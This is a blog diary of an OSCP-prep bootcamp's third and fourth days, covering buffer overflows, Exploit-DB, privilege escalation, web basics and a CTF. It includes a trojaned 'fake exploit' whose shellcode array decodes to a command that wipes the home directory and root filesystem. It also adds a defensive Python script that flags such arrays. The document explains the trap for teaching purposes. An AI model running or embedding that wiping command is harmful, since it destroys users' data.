Day 3

Today was a very interesting day. It is definitely improving. The day started with more of yesterday's buffer overflows. We especially focused on getting a shell using msfvenom.

The instructor gave the first little tip for the OSCP. So far the content is good, but I was really expecting some more tips, explanations, etc. about the day of the exam…

After the buffer overflows they showed us how to search Exploit-DB, both from the command line with “searchsploit” and on the website.

It was cool that they showed us a fake exploit and the consequences of running one without reviewing what it does. Look at it here. In summary:

char jmpcode[] =
       "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
       "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

Which starts to look familiar when run through an online hex-to-ASCII decoder:
?????r?m? ?-?r?f? ?~? ?/?*? ?2?>? ?/??????d?e?v?/?n?u?l?l? ?&?

When you strip it out and clean it up, it looks like this:
"rm -rf ~ /* 2> /dev/null &"

Super coool.
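The same review can be done offline before compiling or running a downloaded exploit. The following is an added example, not code from the course or from the original post: it pulls every hex-escaped char array out of C source and flags the ones that decode to mostly printable text, which suggests a shell command rather than machine code. The `nops` array, the function names and the 0.9 threshold are assumptions made for the illustration.

```python
import re
import string

# Constructed sample: the jmpcode array from the post, plus a made-up
# array of non-printable filler bytes (NOPs and int3) for contrast.
SAMPLE_SOURCE = r'''
char jmpcode[] =
       "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
       "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char nops[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc";
'''

# name[] = "..." "..." ;   (adjacent string literals are concatenated in C)
ARRAY_RE = re.compile(r'(\w+)\s*\[\s*\]\s*=\s*((?:"[^"]*"\s*)+);')
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
PRINTABLE = set(string.printable.encode())


def decode_arrays(source):
    """Return {array_name: bytes} for every hex-escaped char array."""
    out = {}
    for name, literals in ARRAY_RE.findall(source):
        data = bytes(int(h, 16) for h in HEX_RE.findall(literals))
        if data:
            out[name] = data
    return out


def review(source, threshold=0.9):
    """Flag arrays whose bytes are mostly printable ASCII (assumed threshold)."""
    findings = {}
    for name, data in decode_arrays(source).items():
        ratio = sum(b in PRINTABLE for b in data) / len(data)
        if ratio >= threshold:
            findings[name] = data.decode("ascii", errors="replace")
    return findings


if __name__ == "__main__":
    for name, text in review(SAMPLE_SOURCE).items():
        print(f"{name}: decodes to text -> {text!r}")
```

An array that decodes cleanly to text inside something labelled as shellcode is the cue to read the whole file before doing anything else with it.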

After that we fixed some exploits from Exploit-DB, and the takeaway from that is that Offensive Security owns Exploit-DB (I didn't know), so almost for sure the stuff from there will be in the exam.

As a technology nugget they talked about methods of transferring files between machines. It was cool to see SMB, FTP and the classic SimpleHTTPServer.

Almost at the end of the day they taught us basic (very basic) privilege escalation techniques for Windows and Linux, without using any scripts.

I won another sticker by getting a privilege escalation on a device. I used Sherlock and a precompiled exploit, but it worked like magic 😉

The last thing we did was a little bit of Metasploit.

Grade 7.5/10: the content of the day was good, but I'm missing tips and tricks for the exam, to be honest.

Day 4

Today was a very long, long day. Yesterday (day 3) they asked us how long we wanted to stay doing today's CTF. We decided on midnight.

The first part of the day was Metasploit, kind of wrapping up day 3. After doing that, the web stuff started.

To be honest, the web part was super basic. A little bit of (manual) SQL injection, a few XSS examples and why it is bad, RFI, LFI, etc. If you wanna do web, eWAP is much better.

The interesting part for me was Hydra. They told us how to connect it to Burp. It was mostly for debugging but was interesting.

export HYDRA_PROXY_HTTP=http://127.0.0.1:8080

At 4 we had a break and at 5 we started the CTF. Some stuff was super hard (they mentioned that it was going to be more difficult than the OSCP). I only managed to root one box and I got SQL injection on another box.

They have a very interesting strategy. If you get bored you can ask for extra stuff to do. I felt unprepared with the buffer overflows so I did 2 extras. I feel way more comfortable now :). Again, the instructors are super helpful. It is not what you'd expect, a moron just saying Try Harder…

Overall it was an interesting team event and the instructors from Offensive Security were super professional. They stayed till after midnight with happy faces, answering questions. I still don't know how well (or badly) prepared I am for my OSCP, but today was fun.

Grade 9/10: the web stuff was basic but the CTF was very interesting.

————–

Edit. I passed on my first attempt 🙂
https://mexicanpentester.com/2020/02/07/how-i-passed-my-oscp-in-my-first-attempt/